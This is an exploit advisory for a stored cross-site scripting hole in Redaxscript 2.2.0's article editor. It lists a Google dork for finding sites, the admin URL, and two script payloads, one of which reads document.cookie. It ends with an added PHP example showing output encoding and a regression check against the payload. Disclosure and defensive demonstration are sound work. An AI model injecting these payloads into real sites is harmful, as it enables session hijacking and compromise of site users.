
Redaxscript 2.2.0 XSS Vulnerability

Author: Oussama911, Published: 10-01-2015
# Exploit Title: Redaxscript 2.2.0 XSS Vulnerability
# Date: 04-01-2015
# Google Dork : Powered by Redaxscript 2.2.0
# Exploit Author: Oussama911
# Version: 2.2.0
# Vendor Homepage: http://www.redaxscript.com/
# Tested on: OWASP Mantra & Iceweasel
# Greetz : Toxic Dz - Dz Mafia - Anonymous Algeria - Virus28 Team - Djamel11154 - Russi173Oox
# Contact : fb.me/ouss911algerianhacker
# contact team : fb.me/teamvirus28
# Vulnerability Description:

The CMS is vulnerable to XSS attacks. XSS payloads can be run in the new article section.

XSS Vulnerability :

Go to the edit or add new article page:

"http://{target-url}/admin/edit/extras/1"

Add a new article and use one of these payloads:

"><script>alert(String.fromCharCode(48, 120, 57, 55))</script>

or

"><script>alert(document.cookie)</script>
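
Both payloads start with `">`, the sequence that closes a double-quoted HTML attribute value and the tag around it. The PHP below is an added example, not Redaxscript code and not part of the original advisory: it renders a hypothetical form field (the function names and the `title` field are assumptions) with and without output encoding, then parses the result to check whether the first payload, used here as constructed input, produced a script element.

```php
<?php
declare(strict_types=1);

// Hypothetical helper, not Redaxscript code: writes a stored value into an
// input's value attribute with no encoding, so a leading "> ends the attribute.
function renderFieldUnsafe(string $name, string $value): string
{
    return '<input type="text" name="' . $name . '" value="' . $value . '">';
}

// Encode for the HTML attribute context at output time. ENT_QUOTES covers both
// quote characters; ENT_SUBSTITUTE replaces invalid UTF-8 instead of emptying the string.
function esc(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function renderFieldSafe(string $name, string $value): string
{
    return '<input type="text" name="' . esc($name) . '" value="' . esc($value) . '">';
}

// Regression check: parse the rendered markup, count <script> elements, and
// confirm the input's value attribute decodes back to the exact stored string.
function inspect(string $html, string $expected): array
{
    $doc = new DOMDocument();
    libxml_use_internal_errors(true); // keep parser warnings out of the output
    $doc->loadHTML('<!DOCTYPE html><html><body>' . $html . '</body></html>');
    libxml_clear_errors();
    $input = $doc->getElementsByTagName('input')->item(0);
    return [
        'script_elements' => $doc->getElementsByTagName('script')->length,
        'value_intact'    => $input !== null && $input->getAttribute('value') === $expected,
    ];
}

// Constructed input: the first payload listed in the advisory.
$payload = '"><script>alert(String.fromCharCode(48, 120, 57, 55))</script>';
$cases = [
    'unsafe' => renderFieldUnsafe('title', $payload),
    'safe'   => renderFieldSafe('title', $payload),
];
foreach ($cases as $label => $html) {
    $r = inspect($html, $payload);
    printf("%-6s script_elements=%d value_intact=%s\n",
        $label, $r['script_elements'], $r['value_intact'] ? 'yes' : 'no');
}
```

The second payload reads `document.cookie`; marking the session cookie `HttpOnly` keeps it out of reach of page scripts even where an encoding gap remains.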


========
Credits:
========

#Vulnerability found and advisory written by Oussama911 ( Virus28 Team )
